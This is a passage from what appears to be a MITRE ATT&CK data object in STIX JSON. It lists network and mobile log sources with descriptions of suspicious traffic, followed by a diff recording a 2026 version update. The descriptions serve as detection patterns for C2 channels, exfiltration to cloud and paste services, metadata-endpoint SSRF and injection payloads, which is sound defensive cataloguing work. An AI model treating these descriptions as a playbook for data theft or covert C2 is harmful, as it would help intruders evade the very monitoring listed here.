                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "NAT table modification (add/update/delete rule)"
                        },
                        {
                            "name": "networkdevice:IDS",
                            "channel": "content inspection / PCAP / HTTP body"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "ACL/Firewall rule modification or new route injection"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "config change (e.g., logging buffered, pcap buffers)"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Authentication failures, unexpected community string usage, or unauthorized SNMPv1/v2 requests"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Authentication failures or unusual community string usage in SNMP queries"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Symmetric encryption detected without TLS handshake sequence"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "TLS handshake + HTTP headers"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Abnormal certificate chains or non-standard ports carrying TLS"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Unusual POST requests to admin or upload endpoints"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Outbound connections to internal enterprise services exhibiting anomalous protocol behavior, malformed sessions, or exploit-consistent traffic patterns"
                        },
                        {
                            "name": "NSM:Content",
                            "channel": "SSL Certificate Metadata"
                        },
                        {
                            "name": "NSM:Content",
                            "channel": "HTTP Header Metadata"
                        },
                        {
                            "name": "NSM:Content",
                            "channel": "TLS Fingerprint and Certificate Analysis"
                        },
                        {
                            "name": "NSM:Content",
                            "channel": "Traffic on RPC DRSUAPI"
                        },
                        {
                            "name": "NSM:Firewall",
                            "channel": "TLS/HTTP inspection"
                        },
                        {
                            "name": "NSM:Firewall",
                            "channel": "High rate of inbound TCP SYN or ACK packets with missing 3-way handshake completion"
                        },
                        {
                            "name": "NSM:Firewall",
                            "channel": "Anomalous TCP SYN or ACK spikes from specific source or interface"
                        },
                        {
                            "name": "NSM:Firewall",
                            "channel": "Outbound encrypted traffic"
                        },
                        {
                            "name": "NSM:Firewall",
                            "channel": "ICMP/UDP protocol anomaly"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "mqtt.log / xmpp.log (custom log feeds)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "mqtt.log or AMQP custom log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "mqtt.log, xmpp.log, amqp.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "TCP/UDP"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "TCP session tracking"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Captured packet payloads"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "session behavior"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "External C2 channel over TLS"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http/file-xfer: Inbound/outbound transfer of ELF shared objects"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http.log, files.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "unexpected network activity initiated shortly after shell session starts"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP/WebDAV requests that contain NTLMSSP or PROPFIND/MOVE/OPTIONS with Authorization: NTLM"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http.log, ssl.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http.log, conn.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "SPAN or port-mirrored HTTP/S"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http.log, ssl.log, websocket.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ssl.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Browser connections to known C2 or dynamic DNS domains"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Session History Reset"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP "
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "query: High-volume LDAP traffic with filters targeting groupPolicyContainer attributes"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP/TLS Logs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Suspicious URL patterns, uncommon TLDs, short-lived domains, URL shorteners; HTTP method GET/POST"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Suspicious URL patterns, uncommon TLDs, URL shorteners"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Suspicious GET/POST; downloader patterns"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "SSH logins or scp activity"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "remote login and transfer"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Suspicious long-lived or reattached remote desktop sessions from unexpected IPs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP payloads with SQLi/LFI/JNDI/deserialization indicators"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "outbound egress from web host after suspicious request"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Requests towards cloud metadata or command & control from pod IPs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Connections to TCP 427 (SLP) or vCenter web services from untrusted sources"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "NetFlow/sFlow for odd egress to Internet from mgmt plane"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "packet capture or DPI logs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "SMB2_LOGOFF/SMB_TREE_DISCONNECT"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Unusual Base64-encoded content in URI, headers, or POST body"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Base64 strings or gzip in URI, headers, or POST body"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Inbound connections to 445, 3389, 5985-5986 with high error/connection-reset rate, followed by new outbound sessions from the same host to internal assets within short interval."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Inbound connections to monitored service ports from external or unusual internal sources; rapid follow-on lateral connections from the same host."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Inbound to tcp/427 (OpenSLP), tcp/443 (vSphere APIs), tcp/902, tcp/5989 followed by new unexpected outbound sessions from the ESXi/vCenter host."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Inbound to 22/5900/8080 and follow-on internal connections."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http: HTTP body or headers contain long Base64 sections; gzip/deflate + Base64"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http: HTTP body contains long Base64 sections"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http: Base64/MIME looking payloads from ESXi host IP"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "LDAP Bind/Search"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "LDAP Query"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "smtp.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "smtp.log, conn.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "remote CLI session detection"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http.log, ftp.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "PCAP inspection"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "large HTTPS POST requests to webhook endpoints"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Single, low-volume inbound packet (REJ/S0/OTH or uncommon dport/protocol) from src_ip followed by outbound SF connection to src_ip."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Rare inbound packet characteristics (ICMP/UDP/TCP to uncommon port) from src_ip followed \u2264TimeWindow by outbound SF from same host to src_ip."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Inbound one-off packet to uncommon port \u2192 outbound SF to same src_ip within TimeWindow."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "large upload to firmware interface port or path"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http.request: HTTP requests and responses for specific script resources, unexpected content-types (application/octet-stream for script URLs), suspicious referrers, or obfuscated javascript resources"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http::response: HTTP responses with suspicious content-type for scripts, long obfuscated javascript bodies, or redirects to exploit kit domains"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP/HTTPS requests for script resources flagged by content inspection (excessive obfuscation, eval usage, unusual redirects)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ssl.log + http.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http/file-xfer: Outbound transfer of large video-like MIME types soon after capture"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound SCP, TFTP, or FTP sessions carrying configuration file content"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Session Transfer Content"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Captured File Content"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "C2 exfiltration"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Transferred file observations"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http::post: Outbound HTTP POST from host shortly after DB export activity"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTPS API requests to Dropbox, iCloud, Google Drive, OneDrive shortly after DB tool usage"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Observed downgrade in negotiated cipher suites or TLS/SSH versions across sessions"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "New egress from container IP/namespace to Internet or non-approved CIDRs/ASNs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "New VM egress to crypto-mining pools or non-approved Internet ranges within minutes of boot"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http::request: Network connection to package registry or C2 from interpreter shortly after install"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http::request: Outbound HTTP initiated by Python interpreter"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "DrsAddEntry, DrsReplicaAdd, GetNCChanges calls between non-DC and DCs."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "large HTTPS POST requests to text storage domains"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Unexpected ARP replies or DNS responses inconsistent with authoritative servers"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "TLS downgrade or inconsistent DNS answers"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Unusual request pattern leading up to service crash (e.g., malformed or oversized payload)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log or http.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http: HTTP bodies/headers contain long tokens with non-standard alphabets or constant-size periodic POSTs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "dns: DNS labels with excessive length and restricted custom alphabets (e.g., base36 only) repeated frequently"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http: suspicious long tokens with custom alphabets in body/headers"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http: HTTP bodies from ESXi host IPs containing long, non-standard tokens"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Traffic patterns showing downgrade from strong encryption (AES-256) to weaker or plaintext protocols"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP(S) requests with User-Agents typical of PowerShell or curl from desktop; or URIs matching paste-inspired payload hosts"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Egress to non-approved networks from host after terminal exec"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Flow/PCAP analysis for outbound payloads"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log + files.log + ssl.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTPS or custom protocol traffic with large payloads"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Unexpected script or binary content returned in HTTP response body"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Injected content responses with unexpected script/malware signatures"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Content injection observed in HTTPS responses with mismatched certificates or altered payloads"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Relay patterns across IP hops"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ldap.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Probe responses from unauthorized APs responding to client probe requests"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Excessive gratuitous ARP replies on local subnet"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Inbound HTTP POST with suspicious payload size or user-agent"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "POST requests to .php, .jsp, .aspx files with high entropy body"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "dns.log"
                        },
                        {
                            "name": "NSM:FLow",
                            "channel": "dns.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Encrypted tunnels or proxy traffic to non-standard destinations"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "large transfer from management IPs to unauthorized host"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Sustained abnormal inbound request rate targeting application ports (e.g., 80/443/25)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ftp.log, smb_files.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ftp.log, conn.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "mirror/SPAN port"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ftp.log, conn.log, smb_files.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "SSL/TLS Inspection or PCAP"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log, ssl.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http, dns, smb, ssl logs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "dns, ssl, conn"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log, http.log, dns.log, ssl.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ICMP/UDP traffic (Wireshark, Suricata, Zeek)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "icmp.log, weird.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ICMP/UDP monitoring (tcpdump, Wireshark, Zeek)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Unusual responses to LLMNR (UDP 5355) or NBT-NS (UDP 137) queries from unauthorized hosts"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "DHCP OFFER or ACK with unauthorized DNS/gateway parameters"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Multiple DHCP OFFER responses for a single DISCOVER"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "SSL/TLS Handshake Analysis"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP Header Metadata"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Network Capture TLS/HTTP"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "container egress to unknown IPs/domains"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP Request Logging"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ssh connections originating from third-party CIDRs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ssh/smb connections to internal resources from third-party devices"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Degraded encryption throughput or switch to weaker cipher suites compared to historical baselines"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ssl.log (for TLS handshake analysis), dns.log (tunneling indicators)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "host switch egress data"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound HTTP/S"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ssl.log - Certificate Analysis"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ssl.log, conn.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ssl.log, x509.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Packets with unusual flags or payloads outside established flows (e.g., WoL magic FF\u00d76 + 16\u00d7MAC)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Suspicious POSTs to upload endpoints"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "TLS/HTTP download with atypical MIME (application/octet-stream, application/x-zip, application/x-gzip) followed by local decode/write"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP(S)/QUIC media download with opaque content types (image/*, audio/*, video/*) from non-gallery domains or CDNs not previously used by the app"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP(S)/QUIC download of executable/opaque content (application/octet-stream, application/zip, application/java-archive, application/x-dex, application/x-sharedlib, text/javascript)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "burst of DNS queries/connection attempts to RFC1918 or local gateway immediately after scans"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTPS sessions exhibiting periodic request cadence or structured payload exchanges inconsistent with application baseline"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Application-layer indicators observable via enterprise network controls (HTTP method, URI path pattern class, TLS SNI, JA3/ALPN when available, DNS qname/type) showing anomalous or low-and-slow command polling behavior"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Near-term increase in traffic to identity endpoints associated with SMS MFA, account recovery, or OTP verification (IdP, banking, crypto), correlated to SIM/service loss"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Abrupt shift from cellular egress to Wi-Fi-only egress, or new VPN/proxy session establishment following cellular service loss"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Application-layer web traffic showing suspicious redirect chains, iframe/ad-tech cascades, user-agent or environment fingerprinting requests, or staged payload retrieval after page visit"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Application initiates HTTPS connection with repeated certificate validation failure under enterprise proxy followed by direct network retry or stable opaque TLS communication to same endpoint within correlation window"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "App-destination pair shows consistent inspection bypass/refusal pattern followed by direct encrypted communication or repeated short-lived TLS sessions to same endpoint within correlation window"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Application retrieves remote content from non-baselined domain or IP and the transfer direction is inbound to device during the file acquisition phase"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Managed iOS app retrieves remote content from non-baselined domain or IP with inbound payload transfer during the acquisition phase"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Device shows correlated inbound session establishment followed by outbound connections to separate external destinations with overlapping timing and relay-like byte symmetry"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Traffic spike preceding control crash"
                        },
                        {
                            "name": "NSM:Inspection",
                            "channel": "TLS session from mobile app fails, resets, or refuses enterprise interception while same destination/app pair repeatedly establishes direct encrypted communication pattern consistent with pinned certificate/public-key validation"
                        },
                        {
                            "name": "NSM:Inspection",
                            "channel": "TLS handshake from iOS app repeatedly fails or is rejected only when enterprise SSL inspection certificate is presented, indicating certificate or public-key pin validation effect"
                        },
                        {
                            "name": "saas:box",
                            "channel": "API calls exceeding baseline thresholds"
                        },
                        {
                            "name": "saas:confluence",
                            "channel": "REST API access from non-browser agents"
                        },
                        {
                            "name": "TelecomLogs:SS7Signaling",
                            "channel": "Subscriber information queries, routing requests, or location update messages with anomalous node identifiers or unexpected origin patterns"
                        },
                        {
                            "name": "TelecomLogs:SS7Signaling",
                            "channel": "Location resolution, routing, or subscriber information exchanges with anomalous signaling paths or node identities"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Supervised or newly activated device initiates outbound connections to destinations outside Apple, MDM, update, or enterprise-managed baselines while locked, with no recent user interaction, or before expected app enrollment completion"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Application or device component communicates with legitimate external web-service infrastructure such as cloud storage, social media, messaging, collaboration, paste, code-hosting, CDN-backed API, or generic HTTPS service in a pattern inconsistent with the app's approved network baseline, timing, or service class"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Supervised device or managed app communicates with legitimate external web-service infrastructure such as cloud storage, messaging, collaboration, social, paste, or generic HTTPS API platforms in a pattern inconsistent with expected service baseline, managed app role, or normal background refresh behavior"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "App-attributed HTTP GET or HTTPS session to public web platform (social, paste, collaboration, cloud storage, code-hosting) returned content followed by outbound connection to a different domain or IP within TimeWindow"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "DNS query or TLS SNI for previously unseen domain occurred within TimeWindow after session to legitimate web-service domain from same app identity"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Initial session to public web-service domain transferred small response payload followed by connection to new external endpoint with different ASN or domain category"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "App-attributed session to public web-service domain included inbound content retrieval followed by outbound POST, PUT, upload, comment, message send, document update, or API write to same service class within TimeWindow"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Repeated alternating inbound and outbound sessions to same public web-service domain or API endpoint occurred from same app identity with stable recurrence interval"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Outbound write operation to public web-service domain occurred after small inbound response retrieval from same domain or service class without preceding user-visible foreground activity"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "App-attributed HTTP GET, content fetch, sync pull, or inbound-oriented HTTPS session to public web-service domain recurred within TimeWindow without app-attributed POST, PUT, PATCH, upload, comment, message send, or API write to same service class"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Repeated app-attributed retrieval from same public web-service domain or API endpoint occurred at stable recurrence interval with low outbound volume relative to inbound content"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Inbound content retrieval from public web-service domain occurred without subsequent writeback to same service class and was followed by local or downstream activity outside normal app sync profile"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "TLS handshake, HTTP method/header pattern, or WebSocket upgrade was observed on destination port outside approved port set for detected protocol during app-attributed outbound session"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Repeated app-attributed sessions to same destination or service class used non-standard destination port with stable recurrence interval or persistent connection behavior"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Destination port was not in approved protocol-to-port mapping for app identity or service class and session did not match known enterprise proxy, relay, or developer tooling exception"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Observed protocol-to-port pairing was outside approved mapping for managed bundle or service class and did not match enterprise proxy, relay, or developer tooling exception"
                        },
                        {
                            "name": "WebProxy:AccessLogs",
                            "channel": "SSRF-like patterns accessing metadata endpoint through proxy (e.g., Host: 169.254.169.254)"
                        },
                        {
                            "name": "WIDS:AssociationLogs",
                            "channel": "Unauthorized AP or anomalous MAC address connection attempts"
                        },
                        {
                            "name": "WinEventLog:iis",
                            "channel": "IIS Logs"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-Windows Defender/Operational",
                            "channel": "Unusual external domain access"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "Outbound requests with forged tokens/cookies in headers"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "EventCode=5005 (WLAN), EventCode=302 (Bluetooth)"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "ics-attack",
                        "mobile-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-22 14:48:50.367000+00:00\", \"old_value\": \"2025-10-21 15:14:34.343000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][0]\": {\"name\": \"Traffic\", \"channel\": \"None\"}, \"root['x_mitre_log_sources'][35]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Per-app VPN flow logging indicating opaque/archived payload transfer preceding local decode\"}, \"root['x_mitre_log_sources'][36]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Per-App VPN flow with code-like content types (application/octet-stream, application/zip, text/javascript, application/x-mach-o)\"}, \"root['x_mitre_log_sources'][37]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"WKWebView navigation to domain visually similar to target brand (IDN/punycode/alike score)\"}, \"root['x_mitre_log_sources'][90]\": {\"name\": \"NSM:Connections\", \"channel\": \"Outbound connections to internal enterprise services exhibiting anomalous protocol behavior, malformed sessions, or exploit-consistent traffic patterns\"}, \"root['x_mitre_log_sources'][236]\": {\"name\": \"NSM:Flow\", \"channel\": \"TLS/HTTP download with atypical MIME (application/octet-stream, application/x-zip, application/x-gzip) followed by local decode/write\"}, \"root['x_mitre_log_sources'][237]\": {\"name\": \"NSM:Flow\", \"channel\": \"HTTP(S)/QUIC media download with opaque content types (image/*, audio/*, video/*) from non-gallery domains or CDNs not previously used by the app\"}, \"root['x_mitre_log_sources'][238]\": {\"name\": \"NSM:Flow\", \"channel\": \"HTTP(S)/QUIC download of executable/opaque content (application/octet-stream, application/zip, application/java-archive, application/x-dex, application/x-sharedlib, text/javascript)\"}, \"root['x_mitre_log_sources'][239]\": {\"name\": \"NSM:Flow\", \"channel\": \"burst of DNS queries/connection attempts to RFC1918 or local gateway immediately after scans\"}, \"root['x_mitre_log_sources'][240]\": {\"name\": \"NSM:Flow\", \"channel\": \"HTTPS sessions exhibiting periodic request cadence or structured payload exchanges inconsistent with application baseline\"}, \"root['x_mitre_log_sources'][241]\": {\"name\": \"NSM:Flow\", \"channel\": \"Application-layer indicators observable via enterprise network controls (HTTP method, URI path pattern class, TLS SNI, JA3/ALPN when available, DNS qname/type) showing anomalous or low-and-slow command polling behavior\"}, \"root['x_mitre_log_sources'][242]\": {\"name\": \"NSM:Flow\", \"channel\": \"Near-term increase in traffic to identity endpoints associated with SMS MFA, account recovery, or OTP verification (IdP, banking, crypto), correlated to SIM/service loss\"}, \"root['x_mitre_log_sources'][243]\": {\"name\": \"NSM:Flow\", \"channel\": \"Abrupt shift from cellular egress to Wi-Fi-only egress, or new VPN/proxy session establishment following cellular service loss\"}, \"root['x_mitre_log_sources'][244]\": {\"name\": \"NSM:Flow\", \"channel\": \"Application-layer web traffic showing suspicious redirect chains, iframe/ad-tech cascades, user-agent or environment fingerprinting requests, or staged payload retrieval after page visit\"}, \"root['x_mitre_log_sources'][245]\": {\"name\": \"NSM:Flow\", \"channel\": \"Application initiates HTTPS connection with repeated certificate validation failure under enterprise proxy followed by direct network retry or stable opaque TLS communication to same endpoint within correlation window\"}, \"root['x_mitre_log_sources'][246]\": {\"name\": \"NSM:Flow\", \"channel\": \"App-destination pair shows consistent inspection bypass/refusal pattern followed by direct encrypted communication or repeated short-lived TLS sessions to same endpoint within correlation window\"}, \"root['x_mitre_log_sources'][247]\": {\"name\": \"NSM:Flow\", \"channel\": \"Application retrieves remote content from non-baselined domain or IP and the transfer direction is inbound to device during the file acquisition phase\"}, \"root['x_mitre_log_sources'][248]\": {\"name\": \"NSM:Flow\", \"channel\": \"Managed iOS app retrieves remote content from non-baselined domain or IP with inbound payload transfer during the acquisition phase\"}, \"root['x_mitre_log_sources'][249]\": {\"name\": \"NSM:Flow\", \"channel\": \"Device shows correlated inbound session establishment followed by outbound connections to separate external destinations with overlapping timing and relay-like byte symmetry\"}, \"root['x_mitre_log_sources'][250]\": {\"name\": \"NSM:Flow\", \"channel\": \"Traffic spike preceding control crash\"}, \"root['x_mitre_log_sources'][251]\": {\"name\": \"NSM:Inspection\", \"channel\": \"TLS session from mobile app fails, resets, or refuses enterprise interception while same destination/app pair repeatedly establishes direct encrypted communication pattern consistent with pinned certificate/public-key validation\"}, \"root['x_mitre_log_sources'][252]\": {\"name\": \"NSM:Inspection\", \"channel\": \"TLS handshake from iOS app repeatedly fails or is rejected only when enterprise SSL inspection certificate is presented, indicating certificate or public-key pin validation effect\"}, \"root['x_mitre_log_sources'][255]\": {\"name\": \"TelecomLogs:SS7Signaling\", \"channel\": \"Subscriber information queries, routing requests, or location update messages with anomalous node identifiers or unexpected origin patterns\"}, \"root['x_mitre_log_sources'][256]\": {\"name\": \"TelecomLogs:SS7Signaling\", \"channel\": \"Location resolution, routing, or subscriber information exchanges with anomalous signaling paths or node identities\"}, \"root['x_mitre_log_sources'][257]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Supervised or newly activated device initiates outbound connections to destinations outside Apple, MDM, update, or enterprise-managed baselines while locked, with no recent user interaction, or before expected app enrollment completion\"}, \"root['x_mitre_log_sources'][258]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Application or device component communicates with legitimate external web-service infrastructure such as cloud storage, social media, messaging, collaboration, paste, code-hosting, CDN-backed API, or generic HTTPS service in a pattern inconsistent with the app's approved network baseline, timing, or service class\"}, \"root['x_mitre_log_sources'][259]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Supervised device or managed app communicates with legitimate external web-service infrastructure such as cloud storage, messaging, collaboration, social, paste, or generic HTTPS API platforms in a pattern inconsistent with expected service baseline, managed app role, or normal background refresh behavior\"}, \"root['x_mitre_log_sources'][260]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"App-attributed HTTP GET or HTTPS session to public web platform (social, paste, collaboration, cloud storage, code-hosting) returned content followed by outbound connection to a different domain or IP within TimeWindow\"}, \"root['x_mitre_log_sources'][261]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"DNS query or TLS SNI for previously unseen domain occurred within TimeWindow after session to legitimate web-service domain from same app identity\"}, 